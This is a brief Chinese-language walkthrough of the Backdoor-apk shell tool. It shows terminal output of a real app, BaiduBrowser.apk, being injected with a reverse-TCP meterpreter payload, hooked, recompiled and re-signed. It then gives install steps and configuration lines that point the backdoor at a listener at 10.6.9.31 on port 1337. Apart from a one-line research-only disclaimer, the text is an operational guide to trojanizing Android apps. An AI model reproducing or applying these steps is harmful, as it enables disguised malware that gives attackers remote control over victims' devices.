Backdoor-apk可以看成是一个shell脚本程序,它简化了在Android APK文件中添加后门的过程。安全研究人员在使用该工具前应该对Linux、Bash、Metasploit、Apktool、Android SDK 、smali有所了解,同时原作者表示该工具仅仅供研究和学习使用。
参数以及启用
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk [*] Generating reverse tcp meterpreter payload...done. [+] Handle the meterpreter connection at: 10.6.9.31:1337 [*] Decompiling original APK file...done. [*] Decompiling RAT APK file...done. [*] Creating new directories in original project for RAT smali files...done. [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Locating smali file to hook in original project...done. [*] Adding hook in original smali file...done. [*] Merging permissions of original and payload projects...done. [*] Recompiling original project with backdoor...done. [*] Signing recompiled APK...done. root@kali:~/Android/evol-lab/BaiduBrowserRat# |
制作好的apk文件应该在original/dist目录下找到,将其安装在测试设备上,然后设置好IP以及端口再利用meterpreter 进行测试。
注意
如果在Kali里面运行还需要安装兼容库
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
配置
在出现问题时可更新下面配置信息
MSFVENOM=msfvenom LHOST="10.6.9.31" LPORT="1337" APKTOOL=apktool2 MY_PATH=`pwd` ORIG_APK_FILE=$1 RAT_APK_FILE=Rat.apk LOG_FILE=run.log |
